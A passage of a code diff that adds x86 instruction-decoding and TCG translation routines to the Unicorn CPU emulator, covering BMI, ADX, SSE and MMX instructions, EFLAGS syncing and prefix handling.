0x1f1: + /* For these insns, the f3 prefix is supposed to have priority + over the 66 prefix, but that's not what we implement above + setting b1. */ + if (s->prefix & PREFIX_REPNZ) { + goto do_crc32; + } + /* FALLTHRU */ + case 0x0f0: /* movbe Gy,My */ + case 0x0f1: /* movbe My,Gy */ + if (!(s->cpuid_ext_features & CPUID_EXT_MOVBE)) { + goto illegal_op; + } + if (s->dflag != MO_64) { + ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); + } else { + ot = MO_64; + } + + gen_lea_modrm(env, s, modrm); + if ((b & 1) == 0) { + tcg_gen_qemu_ld_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, ot | MO_BE); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_regs[reg], cpu_A0, + s->mem_index, ot | MO_BE); + } + break; + + case 0x0f2: /* andn Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_regs[s->vex_v], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0x0f7: /* bextr Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + { + TCGv bound, zero; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Extract START, and shift the operand. + Shifts larger than operand size get zeros. */ + tcg_gen_ext8u_tl(tcg_ctx, cpu_A0, *cpu_regs[s->vex_v]); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_A0); + + bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, *cpu_T[0], cpu_A0, bound, + *cpu_T[0], zero); + tcg_temp_free(tcg_ctx, zero); + + /* Extract the LEN into a mask. Lengths larger than + operand size get all ones. */ + tcg_gen_shri_tl(tcg_ctx, cpu_A0, *cpu_regs[s->vex_v], 8); + tcg_gen_ext8u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, cpu_A0, cpu_A0, bound, + cpu_A0, bound); + tcg_temp_free(tcg_ctx, bound); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], 1); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_A0); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], 1); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + } + break; + + case 0x0f5: /* bzhi Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + { + TCGv bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); + /* Note that since we're using BMILG (in order to get O + cleared) we need to store the inverse into C. */ + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, cpu_cc_src, + *cpu_T[1], bound); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, *cpu_T[1], *cpu_T[1], + bound, bound, *cpu_T[1]); + tcg_temp_free(tcg_ctx, bound); + } + tcg_gen_movi_tl(tcg_ctx, cpu_A0, -1); + tcg_gen_shl_tl(tcg_ctx, cpu_A0, cpu_A0, *cpu_T[1]); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 0x3f6: /* mulx By, Gy, rdx, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + switch (ot) { + default: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EDX]); + tcg_gen_mulu2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[s->vex_v], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp3_i32); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_T[0], *cpu_T[1], + *cpu_T[0], *cpu_regs[R_EDX]); + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[s->vex_v], *cpu_T[0]); + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[1]); + break; +#endif + } + break; + + case 0x3f5: /* pdep Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Note that by zero-extending the mask operand, we + automatically handle zero-extending the result. */ + if (ot == MO_64) { + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } else { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } + gen_helper_pdep(tcg_ctx, *cpu_regs[reg], *cpu_T[0], *cpu_T[1]); + break; + + case 0x2f5: /* pext Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Note that by zero-extending the mask operand, we + automatically handle zero-extending the result. */ + if (ot == MO_64) { + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } else { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } + gen_helper_pext(tcg_ctx, *cpu_regs[reg], *cpu_T[0], *cpu_T[1]); + break; + + case 0x1f6: /* adcx Gy, Ey */ + case 0x2f6: /* adox Gy, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_ADX)) { + goto illegal_op; + } else { + TCGv carry_in, carry_out, zero; + int end_op; + + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + /* Re-use the carry-out from a previous round. */ + TCGV_UNUSED(carry_in); + carry_out = (b == 0x1f6 ? cpu_cc_dst : cpu_cc_src2); + switch (s->cc_op) { + case CC_OP_ADCX: + if (b == 0x1f6) { + carry_in = cpu_cc_dst; + end_op = CC_OP_ADCX; + } else { + end_op = CC_OP_ADCOX; + } + break; + case CC_OP_ADOX: + if (b == 0x1f6) { + end_op = CC_OP_ADCOX; + } else { + carry_in = cpu_cc_src2; + end_op = CC_OP_ADOX; + } + break; + case CC_OP_ADCOX: + end_op = CC_OP_ADCOX; + carry_in = carry_out; + break; + default: + end_op = (b == 0x1f6 ? CC_OP_ADCX : CC_OP_ADOX); + break; + } + /* If we can't reuse carry-out, get it out of EFLAGS. */ + if (TCGV_IS_UNUSED(carry_in)) { + if (s->cc_op != CC_OP_ADCX && s->cc_op != CC_OP_ADOX) { + gen_compute_eflags(s); + } + carry_in = cpu_tmp0; + tcg_gen_shri_tl(tcg_ctx, carry_in, cpu_cc_src, + ctz32(b == 0x1f6 ? CC_C : CC_O)); + tcg_gen_andi_tl(tcg_ctx, carry_in, carry_in, 1); + } + + switch (ot) { +#ifdef TARGET_X86_64 + case MO_32: + /* If we know TL is 64-bit, and we want a 32-bit + result, just do everything in 64-bit arithmetic. */ + tcg_gen_ext32u_i64(tcg_ctx, *cpu_regs[reg], *cpu_regs[reg]); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_add_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_regs[reg]); + tcg_gen_add_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], carry_in); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[0]); + tcg_gen_shri_i64(tcg_ctx, carry_out, *cpu_T[0], 32); + break; +#endif + default: + /* Otherwise compute the carry-out in two steps. */ + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_add2_tl(tcg_ctx, *cpu_T[0], carry_out, + *cpu_T[0], zero, + carry_in, zero); + tcg_gen_add2_tl(tcg_ctx, *cpu_regs[reg], carry_out, + *cpu_regs[reg], carry_out, + *cpu_T[0], zero); + tcg_temp_free(tcg_ctx, zero); + break; + } + set_cc_op(s, end_op); + } + break; + + case 0x1f7: /* shlx Gy, Ey, By */ + case 0x2f7: /* sarx Gy, Ey, By */ + case 0x3f7: /* shrx Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + if (ot == MO_64) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v], 63); + } else { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v], 31); + } + if (b == 0x1f7) { + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else if (b == 0x2f7) { + if (ot != MO_64) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + tcg_gen_sar_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + if (ot != MO_64) { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + case 0x0f3: + case 0x1f3: + case 0x2f3: + case 0x3f3: /* Group 17 */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + switch (reg & 7) { + case 1: /* blsr By,Ey */ + tcg_gen_neg_tl(tcg_ctx, *cpu_T[1], *cpu_T[0]); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, s->vex_v, *cpu_T[0]); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 2: /* blsmsk By,Ey */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_cc_src); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 3: /* blsi By, Ey */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_cc_src); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + default: + goto illegal_op; + } + break; + + default: + goto illegal_op; + } + break; + + case 0x03a: + case 0x13a: + b = modrm; + modrm = cpu_ldub_code(env, s->pc++); + rm = modrm & 7; + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (b1 >= 2) { + goto illegal_op; + } + + sse_fn_eppi = sse_op_table7[b].op[b1]; + if (!sse_fn_eppi) { + goto illegal_op; + } + if (!(s->cpuid_ext_features & sse_op_table7[b].ext_mask)) + goto illegal_op; + + if (sse_fn_eppi == SSE_SPECIAL) { + ot = mo_64_32(s->dflag); + rm = (modrm & 7) | REX_B(s); + if (mod != 3) + gen_lea_modrm(env, s, modrm); + reg = ((modrm >> 3) & 7) | rex_r; + val = cpu_ldub_code(env, s->pc++); + switch (b) { + case 0x14: /* pextrb */ + tcg_gen_ld8u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_B(val & 15))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_UB); + } + break; + case 0x15: /* pextrw */ + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_W(val & 7))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_LEUW); + } + break; + case 0x16: + if (ot == MO_32) { /* pextrd */ + tcg_gen_ld_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + if (mod == 3) { + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[rm], cpu_tmp2_i32); + } else { + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + } else { /* pextrq */ +#ifdef TARGET_X86_64 + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(val & 1))); + if (mod == 3) { + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[rm], cpu_tmp1_i64); + } else { + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + } +#else + goto illegal_op; +#endif + } + break; + case 0x17: /* extractps */ + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_LEUL); + } + break; + case 0x20: /* pinsrb */ + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], rm); + } else { + tcg_gen_qemu_ld_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_UB); + } + tcg_gen_st8_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_B(val & 15))); + break; + case 0x21: /* insertps */ + if (mod == 3) { + tcg_gen_ld_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State,xmm_regs[rm] + .XMM_L((val >> 6) & 3))); + } else { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State,xmm_regs[reg] + .XMM_L((val >> 4) & 3))); + if ((val >> 0) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(0))); + if ((val >> 1) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(1))); + if ((val >> 2) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(2))); + if ((val >> 3) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(3))); + break; + case 0x22: + if (ot == MO_32) { /* pinsrd */ + if (mod == 3) { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[rm]); + } else { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + } else { /* pinsrq */ +#ifdef TARGET_X86_64 + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, ot, cpu_tmp1_i64, rm); + } else { + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + } + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(val & 1))); +#else + goto illegal_op; +#endif + } + break; + } + return; + } + + if (b1) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); + } else { + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, op2_offset); + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } else { + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, op2_offset); + } + } + val = cpu_ldub_code(env, s->pc++); + + if ((b & 0xfc) == 0x60) { /* pcmpXstrX */ + set_cc_op(s, CC_OP_EFLAGS); + + if (s->dflag == MO_64) { + /* The helper must use entire 64-bit gp registers */ + val |= 1 << 8; + } + } + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_eppi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1, tcg_const_i32(tcg_ctx, val)); + break; + + case 0x33a: + /* Various integer extensions at 0f 3a f[0-f]. */ + b = modrm | (b1 << 8); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + switch (b) { + case 0x3f0: /* rorx Gy,Ey, Ib */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + b = cpu_ldub_code(env, s->pc++); + if (ot == MO_64) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], b & 63); + } else { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_rotri_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, b & 31); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + default: + goto illegal_op; + } + break; + + default: + goto illegal_op; + } + } else { + /* generic MMX or SSE operation */ + switch(b) { + case 0x70: /* pshufx insn */ + case 0xc6: /* pshufx insn */ + case 0xc2: /* compare insns */ + s->rip_offset = 1; + break; + default: + break; + } + if (is_xmm) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod != 3) { + int sz = 4; + + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,xmm_t0); + + if( (b >= 0x50 && b <= 0x5a) || + (b >= 0x5c && b <= 0x5f) || + b == 0xc2 ) { + /* Most sse scalar operations. */ + if (b1 == 2) { + sz = 2; + } else if (b1 == 3) { + sz = 3; + } + } else if( b == 0x2e || /* ucomis[sd] */ + b == 0x2f ) /* comis[sd] */ + { + if (b1 == 0) { + sz = 2; + } else { + sz = 3; + } + } + + switch (sz) { + case 2: + /* 32 bit access */ + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_t0.XMM_L(0))); + break; + case 3: + /* 64 bit access */ + gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.XMM_D(0))); + break; + default: + /* 128 bit access */ + gen_ldo_env_A0(s, op2_offset); + break; + } + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_ldq_env_A0(s, op2_offset); + } else { + rm = (modrm & 7); + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + } + switch(b) { + case 0x0f: /* 3DNow! data insns */ + if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + sse_fn_epp = sse_op_table5[val]; + if (!sse_fn_epp) { + goto illegal_op; + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x70: /* pshufx insn */ + case 0xc6: /* pshufx insn */ + val = cpu_ldub_code(env, s->pc++); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + /* XXX: introduce a new table? */ + sse_fn_ppi = (SSEFunc_0_ppi)sse_fn_epp; + sse_fn_ppi(tcg_ctx, cpu_ptr0, cpu_ptr1, tcg_const_i32(tcg_ctx, val)); + break; + case 0xc2: + /* compare insns */ + val = cpu_ldub_code(env, s->pc++); + if (val >= 8) + goto illegal_op; + sse_fn_epp = sse_op_table4[val][b1]; + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0xf7: + /* maskmov : we must prepare A0 */ + if (mod != 3) + goto illegal_op; + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EDI]); + gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + /* XXX: introduce a new table? */ + sse_fn_eppt = (SSEFunc_0_eppt)sse_fn_epp; + sse_fn_eppt(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1, cpu_A0); + break; + default: + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + if (b == 0x2e || b == 0x2f) { + set_cc_op(s, CC_OP_EFLAGS); + } + } +} + +// Unicorn: sync EFLAGS on demand +static void sync_eflags(DisasContext *s, TCGContext *tcg_ctx) +{ + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + + gen_update_cc_op(s); + gen_helper_read_eflags(tcg_ctx, *cpu_T[0], cpu_env); + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, eflags)); +} + +/* +static void restore_eflags(DisasContext *s, TCGContext *tcg_ctx) +{ + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, eflags)); + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK) & 0xffff)); + set_cc_op(s, CC_OP_EFLAGS); +} +*/ + +/* convert one instruction. s->is_jmp is set if the translation must + be stopped. Return the next pc value */ +static target_ulong disas_insn(CPUX86State *env, DisasContext *s, + target_ulong pc_start) // qq +{ + int b, prefixes; + int shift; + TCGMemOp ot, aflag, dflag; + int modrm, reg, rm, mod, op, opreg, val; + target_ulong next_eip, tval; + int rex_w, rex_r; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + TCGArg *save_opparam_ptr = tcg_ctx->gen_opparam_ptr; + bool cc_op_dirty = s->cc_op_dirty; + bool changed_cc_op = false; + + s->pc = pc_start; + s->prefix = 0; + + // end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate the HLT instruction + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_hlt(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + return s->pc; + } + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, pc_start); + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { + if (s->last_cc_op != s->cc_op) { + sync_eflags(s, tcg_ctx); + s->last_cc_op = s->cc_op; + changed_cc_op = true; + } + gen_uc_tracecode(tcg_ctx, 0xf1f1f1f1, UC_HOOK_CODE_IDX, env->uc, pc_start); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + prefixes = 0; + s->override = -1; + rex_w = -1; + rex_r = 0; +#ifdef TARGET_X86_64 + s->rex_x = 0; + s->rex_b = 0; + s->uc = env->uc; + tcg_ctx->x86_64_hregs = 0; +#endif + s->rip_offset = 0; /* for relative ip address */ + s->vex_l = 0; + s->vex_v = 0; + next_byte: + b = cpu_ldub_code(env, s->pc); + s->pc++; + /* Collect prefixes. */ + switch (b) { + case 0xf3: + prefixes |= PREFIX_REPZ; + goto next_byte; + case 0xf2: + prefixes |= PREFIX_REPNZ; + goto next_byte; + case 0xf0: + prefixes |= PREFIX_LOCK; + goto next_byte; + case 0x2e: + s->override = R_CS; + goto next_byte; + case 0x36: + s->override = R_SS; + goto next_byte; + case 0x3e: + s->override = R_DS; + goto next_byte; + case 0x26: + s->override = R_ES; + goto next_byte; + case 0x64: + s->override = R_FS; + goto next_byte; + case 0x65: + s->override = R_GS; + goto next_byte; + case 0x66: + prefixes |= PREFIX_DATA; + goto next_byte; + case 0x67: + prefixes |= PREFIX_ADR; + goto next_byte; +#ifdef TARGET_X86_64 + case 0x40: + case 0x41: + case 0x42: + case 0x43: + case 0x44: + case 0x45: + case 0x46: + case 0x47: + case 0x48: + case 0x49: + case 0x4a: + case 0x4b: + case 0x4c: + case 0x4d: + case 0x4e: + case 0x4f: + if (CODE64(s)) { + /* REX prefix */ + rex_w = (b >> 3) & 1; + rex_r = (b & 